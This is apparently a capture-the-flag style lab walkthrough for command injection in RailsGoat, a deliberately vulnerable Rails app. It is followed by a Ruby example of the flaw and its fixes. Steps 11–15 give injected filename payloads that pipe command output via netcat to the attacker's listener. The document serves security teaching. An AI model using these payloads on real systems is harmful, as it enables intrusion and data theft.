
Name: Command Injection III

URL: https://attackdefense.com/challengedetails?cid=1907

Type: Webapp Pentesting Basics

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: Determine the IP address of the target machine.

Command: ifconfig

The IP address of the host (attacker) machine is 192.250.158.2. In this lab environment the target is assigned the next address in the same subnet, so the target machine has IP address 192.250.158.3.

Step 2: Scan the target machine using nmap.

Command: nmap 192.250.158.3

The scan shows that port 3000 is open on the target machine.

Step 3: Interact with the application available on port 3000 of the target machine.

Open the following URL in Firefox:

URL: http://192.250.158.3:3000

RailsGoat (a deliberately vulnerable Ruby on Rails application) is hosted on the target machine.

Step 4: Click on the "Tutorial Credentials" button in the top header to view the login credentials. Click on the "I understand" button to reveal them.

Login using the following credentials:

Email: admin@metacorp.com
Password: admin1234

After login:

Step 5: Navigate to the "BENEFIT FORMS" option.

Step 6: Click on the Browse button and select the README file from the Desktop.

Step 7: Configure Firefox to use Burp Suite as its proxy. Click on the FoxyProxy plugin icon at the top-right of the browser and select "Burp Suite".

Step 8: Start Burp Suite: navigate to the Web Application Analysis menu and select "burpsuite". Click Next, then click on Start Burp.

Step 9: Click on the Start Upload button to upload the selected README file. The request will be intercepted by Burp Suite and will appear in the Proxy tab.

Step 10: Send the intercepted request to Repeater (right-click the request and choose "Send to Repeater", or press Ctrl+R).
Step 11: Start a netcat listener on the host machine.

Command: nc -lvp 4444

Step 12: In the Repeater tab of Burp Suite, change the value of the "benefits[backup]" parameter to "true" and inject the command injection payload into the filename of the uploaded file (the filename attribute in the Content-Disposition header of the file part of the multipart request).

Modify the filename so that it carries the payload, for example:

README;nc 192.250.158.2 4444

Because the application builds a shell command that contains the user-supplied filename, the shell treats ";" as a command separator: everything after it, i.e. "nc 192.250.158.2 4444", is executed as a second command. That command connects back to the netcat listener on the host machine.

Click on the "Send" button to send the request.

A connection will be received on the netcat listener, confirming that a command injection vulnerability exists.

Step 13: Restart the netcat listener with the keep-alive option (-k). With -k, netcat keeps listening after a client disconnects, so the same listener can accept a new connection for every request sent from Repeater.

Command: nc -klvp 4444


Step 14: Execute a command on the target and pipe its output into a netcat connection back to the host. Modify the filename value in the request (in the Repeater tab) so that the command's output is piped into netcat; the netcat portion of the payload is:

Command: nc -w 1 192.250.158.2 4444

The -w 1 option makes netcat close the connection after it has been idle for 1 second, so the injected command returns (and the HTTP request completes) once the output has been sent, instead of holding the connection open.

Send the request.

The output of the command will be displayed on the netcat listener.

Step 15: Modify the command in the Repeater window to list the processes running on the target machine.

Command: ps aux | nc -w 1 192.250.158.2 4444

Click on the Send button to send the request.

The processes running on the target machine will be listed on the netcat listener.
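The root cause exploited in Steps 12-15 and two ways to close it, as an added Ruby example written for this document (it is not RailsGoat's source; the function names, the allow-list regex and the sample filenames are illustrative assumptions). The vulnerable pattern modelled here is the one the lab's behaviour implies: the client-supplied upload filename is interpolated into a single shell string that the application hands to system(), so ";" or "|" in the filename starts a second command.

```ruby
require "fileutils"
require "tmpdir"

# Vulnerable pattern (constructed to mirror the behaviour the lab exploits, not
# RailsGoat's actual source): the client-controlled upload filename is
# interpolated into one shell string that the application would pass to
# system(). A ';' or '|' in the filename ends the cp command and starts a
# second one, which is exactly what "README;nc 192.250.158.2 4444" does.
def vulnerable_backup_command(data_path, src, original_filename)
  "cp #{src} #{data_path}/bak_#{original_filename}"
end

# Mitigation 1: keep the filename out of any shell. Array-form system()/spawn()
# passes each element straight to execve(2); no shell ever parses ';', '|' or
# '$(...)', so the whole payload becomes one (odd-looking) destination path.
def argv_backup_command(data_path, src, original_filename)
  ["cp", src, File.join(data_path, "bak_#{original_filename}")]
end

# Mitigation 2: allow-list the filename before it is used anywhere. Strip any
# directory part the client supplied, then accept only a conservative charset.
SAFE_NAME = /\A[A-Za-z0-9][A-Za-z0-9._-]{0,127}\z/

def sanitize_filename(original_filename)
  name = File.basename(original_filename.to_s)
  unless SAFE_NAME.match?(name)
    raise ArgumentError, "rejected upload filename: #{original_filename.inspect}"
  end
  name
end

# Hardened backup: validated name, copy performed in-process with FileUtils, so
# there is no command line at all for an attacker to break out of.
def safe_backup(data_path, src, original_filename)
  dst = File.join(data_path, "bak_#{sanitize_filename(original_filename)}")
  FileUtils.cp(src, dst)
  dst
end

# Run the three variants against the lab's payload in a scratch directory and
# return what each would do, so the difference can be inspected (or asserted).
def demo(payload = "README;nc 192.250.158.2 4444")
  Dir.mktmpdir do |dir|
    src = File.join(dir, "upload.tmp")
    File.write(src, "benefit form contents") # constructed stand-in for the uploaded file

    safe_result =
      begin
        safe_backup(dir, src, payload)
      rescue ArgumentError => e
        e.message
      end

    {
      shell_string: vulnerable_backup_command(dir, src, payload), # would run nc as a 2nd command
      argv:         argv_backup_command(dir, src, payload),       # 3 argv entries, no shell
      safe:         safe_result,                                  # rejected before any I/O
      clean_copy:   File.exist?(safe_backup(dir, src, "README")), # legitimate name still works
    }
  end
end

if __FILE__ == $PROGRAM_NAME
  demo.each { |k, v| puts "#{k}: #{v.inspect}" }
end
```

If a shell command is genuinely needed, call it as `system(*argv_backup_command(...))`; the array form alone removes the shell from the path and is the fix that stops the ";" and "|" payloads used in this lab. The allow-list is a second, independent layer: it also rejects names that would be harmless to the shell but dangerous elsewhere (path traversal, spaces, quotes), and it fails closed with an exception rather than trying to "clean" a hostile value.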

References:

1. OWASP A1:2017 Injection (https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A1-Injection)
2. OWASP Top 10 (https://owasp.org/www-project-top-ten/)
3. RailsGoat (https://railsgoat.cktricky.com/)
